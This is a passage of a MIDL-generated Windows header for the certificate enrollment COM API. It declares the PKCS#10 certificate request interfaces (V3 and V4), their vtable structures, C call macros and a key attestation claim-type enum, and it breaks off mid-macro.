#define IX509CertificateRequestPkcs10V3_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10V3_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10V3_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10V3_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestPkcs10V3_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V3_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V3_InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V3_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs10V3_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 


#define IX509CertificateRequestPkcs10V3_get_AttestPrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_AttestPrivateKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_AttestPrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_AttestPrivateKey(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_AttestationEncryptionCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_AttestationEncryptionCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_AttestationEncryptionCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_AttestationEncryptionCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_ChallengePassword(This,pValue)	\
    ( (This)->lpVtbl -> get_ChallengePassword(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_ChallengePassword(This,Value)	\
    ( (This)->lpVtbl -> put_ChallengePassword(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10V3_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0079 */
/* [local] */ 

typedef 
enum KeyAttestationClaimType
    {
        XCN_NCRYPT_CLAIM_NONE	= 0,
        XCN_NCRYPT_CLAIM_AUTHORITY_AND_SUBJECT	= 0x3,
        XCN_NCRYPT_CLAIM_AUTHORITY_ONLY	= 0x1,
        XCN_NCRYPT_CLAIM_SUBJECT_ONLY	= 0x2,
        XCN_NCRYPT_CLAIM_UNKNOWN	= 0x1000
    } 	KeyAttestationClaimType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0079_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0079_v0_0_s_ifspec;

#ifndef __IX509CertificateRequestPkcs10V4_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10V4_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10V4 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10V4;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab363-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs10V4 : public IX509CertificateRequestPkcs10V3
    {
    public:
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ClaimType( 
            /* [retval][out] */ __RPC__out KeyAttestationClaimType *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ClaimType( 
            /* [in] */ KeyAttestationClaimType Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_AttestPrivateKeyPreferred( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_AttestPrivateKeyPreferred( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10V4Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10V4 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestationEncryptionCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestationEncryptionCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ChallengePassword )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ChallengePassword )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClaimType )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out KeyAttestationClaimType *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClaimType )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ KeyAttestationClaimType Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestPrivateKeyPreferred )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestPrivateKeyPreferred )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10V4Vtbl;

    interface IX509CertificateRequestPkcs10V4
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10V4Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10V4_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10V4_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10V4_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10V4_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10V4_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10V4_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10V4_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10V4_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10V4_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10V4_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10V4_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_Silent(This,pValue)	\
